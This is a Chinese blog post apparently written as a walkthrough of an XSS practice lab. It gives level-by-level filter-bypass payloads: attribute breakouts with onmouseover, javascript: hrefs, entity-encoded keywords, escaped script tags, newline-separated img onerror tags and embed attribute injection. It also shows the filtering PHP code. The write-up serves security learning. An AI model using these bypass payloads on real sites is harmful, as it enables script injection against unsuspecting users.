XSS实战演练2

最新推荐文章于 2024-03-22 11:26:58 发布
最新推荐文章于 2024-03-22 11:26:58 发布
阅读量430 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bylfsj/article/details/100835509
版权

1.多个文本框

第三关

a.攻击思路

在这里插入图片描述
发现p1被完全过滤,考虑抓包修改P2
在这里插入图片描述

b.攻击代码

发现p2并没有过滤,攻击成功。
在这里插入图片描述

2.多个文本框----隐藏参数

a.攻击思路

在这里插入图片描述

b.攻击代码在这里插入图片描述

抓包修改p3

c.攻击结果

在这里插入图片描述

3.字符长度受限

a.服务端思路

在这里插入图片描述

b.攻击代码

审查修改为150

"onmouseover=alert(document.domain)//

c攻击结果

在这里插入图片描述

4.输入转义< 、>、\

a.服务端思路

在这里插入图片描述
未转义”
在这里插入图片描述

b.攻击代码

"onmouseover=alert(document.domain)//

c攻击结果

在这里插入图片描述

5 a标签转义“

a.服务端思路

在这里插入图片描述
考虑a 中href 伪协议

b.攻击代码

javascript:alert(document.domain)

c攻击结果

在这里插入图片描述

6 过滤关键字domain

a.服务端思路

在这里插入图片描述
考虑编码绕过

b.攻击代码

"onmouseover=alert(document.do&#109;ain)//

c攻击结果

在这里插入图片描述

7.标签内on过滤

a.服务端思路

在这里插入图片描述
在这里插入图片描述

b.攻击代码

进行正则绕过,插入不可见编码
在这里插入图片描述

c攻击结果

在这里插入图片描述

8.document.write

a.服务端思路

在这里插入图片描述
过滤了” < >

b.攻击代码

尝试编码,由于document.write会去编码的‘\’,因此双写

原来的

\\u003cscript\\u003ealert(document.domain)\\u003c/script\\u003e

c攻击结果

在这里插入图片描述

9.过滤空格, script, /

服务端代码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace(" ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>

攻击思路

通过插入%0d、%0a(回车换行)实现xss攻击绕过,
由于过滤**’/’**-----------------------首先想到,空格用不可见符代替。

注意无空格隔开,反而会使得自动添加与前标签对应的</>…

http://xss.tesla-space.com/level16.php?keyword=<img%0asrc=x%0aonerror=alert(1)>

攻击效果

在这里插入图片描述

10.embed

服务端代码

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

攻击思路

俩个输出的值都被做了实体化转义,无法闭合标签
PHP中,echo的src并没有 **‘’**表示范围,意味着可以绕开。
本身支持事件。通过%20【或者其他如%0a等空白符绕开】

http://xss.tesla-space.com/level17.php?arg01=123%20onmouseover=alert('xss')&arg=456

攻击效果

在这里插入图片描述

embed存在‘无法绕开

服务端代码

<?php
ini_set("display_errors", 0);
echo '<embed src="xsf03.swf?'.htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"]).'" width=100% heigth=100%>';
?>

攻击思路

此时,可以看见src后跟 ,无法如上题绕开。

bylfsj
关注
专栏目录
【项目实战】Web端常见的高风险漏洞与解决方法(XSS跨站脚本攻击 )
本本本添哥
03-31 422
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 946
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
2.2反射性xss案例演示
千寻的博客
11-22 384
案例演示 第一步 确认漏洞点的存在 输入一些特殊字符,查看是否过滤 第二步 输入xss语句 第三步 查看页面源码 第四步 代码审计 补充:GET和POST典型区别 GET是以url方式提交数据; POST是以表单方式在请求体里面提交; GET方式的XSS漏洞更加容易被利用,一般利用的方式是将带有跨站脚本的URL伪装后发送给目标, *POST方式由于是以表单方式提交,无法直接使用URL方式进行攻击,需要点击链接,发送post请求 摘抄 希望你在阳光下笑得像个孩子, 风雨里坚强的
反射型XSS实战演练
liguangyao213的博客
12-22 1835
原理:服务器接收get或者post请求时,未对数据进行合理处置,直接响应到前端页面上。 GET请求 http://81.68.155.178:82/vul/xss/xss_reflected_get.php长度限制,先取消长度限制,再进行xss测试 POST请求 POST请求是为了模拟后台用户登录后存在XSS的环境。POST请求登录后其实就是进入了网站的后台,更方便来调取cookie。admin/123456 登录后和上面的GET请求就一样了,只是登录后会产生有cookie 登录后:
XSS攻击(3), 实战XSS注入思路
探测???
10-19 1268
上面代码在网页中嵌入一个Adobe Flash文件. 因为在2020年底之后, 主流的浏览器已经不支持Flash文件,前面value虽然闭合了, 但是后面无法执行事件. 那么可能一些类似的事件都被防御了.前面的input标签虽然闭合了, 但是后面的script标签被替换了, 无法执行js.因为F12是临时修改, 这里的控件在提交之后就会还原成隐藏的, 所以后面使用一个。这时前面的value被闭合, 后面多了一个事件, 单机文本框即可弹出.如果输入的符号没有被转义或替换, 说明前面可以闭合, 进一步测试.
DVWA靶场的XSS和SQL注入实战
bwxzdjn的博客
03-25 961
XSS和SQL注入学习后的实操,主要是借助DVWA靶场,通过对不同分类和过滤的实战,进一步掌握不同分类的XSS和SQL注入攻击方法。(不包含不可能章节)
逻辑漏洞挖掘之XSS漏洞原理分析及实战演练
最新发布
yj520400的博客
03-22 1258
2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全意识。作为开篇第一章,本文选取了广为熟知的XSS逻辑漏洞进行介绍。1.XSS漏洞的定义跨站脚本(Cross Site Script),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本缩写为XSS
xss-labs-master.rar
05-09
总结,"xss-labs-master.rar" 是一个宝贵的XSS学习资源,它不仅涵盖了XSS的基础理论,还提供了实战经验,对于想要深入理解和防范XSS攻击的人来说,是一次难得的训练机会。通过系统地完成这二十个关卡,你将能够更好...
Burpsuite 指纹特征绕过
Javachichi的博客
12-05 2077
需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。
XSS 攻击案例
人生不过是一场旅行,你路过我,我路过你,各自向前,各自修行。
07-05 2576
The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript The victim requests the web page from the website The website serves the vict...
最全的XSS漏洞攻防
qq_53530934的博客
12-17 1043
XSS漏洞攻防/pikachu靶场XSS破解
【转载】XSS靶机专项练习(总结)
xhc6666的博客
05-22 604
XSS靶机测试专项练习总结
网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 9018
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
实验三:XSS和SQL注入
yghlqgt的博客
11-27 769
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
xss hack学习靶场 writeup
dianmangji9200的博客
08-12 658
靶场链接http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg 参考博客https://blog.csdn.net/xlsj228/article/details/93166486 1 可以看到url中的test参数出现在页面中,虽然f12看到了下一关的地址,我假装没看见 在url处构造payload:xss.tesla-space....
【Web篇】(6.3) ❀ 08. 跨站脚本 - 反射型XSS ❀ FortiWeb 攻防演练
防火墙技术专栏
07-20 1025
  【简介】跨站脚本(Cross-site scripting,简称:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。...
XSS攻击实战
qq_44915227的博客
04-18 2555
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
XSS注入(跨站脚本攻击)
wwwwyyyrre的博客
06-13 6603
今天学习一下xss注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值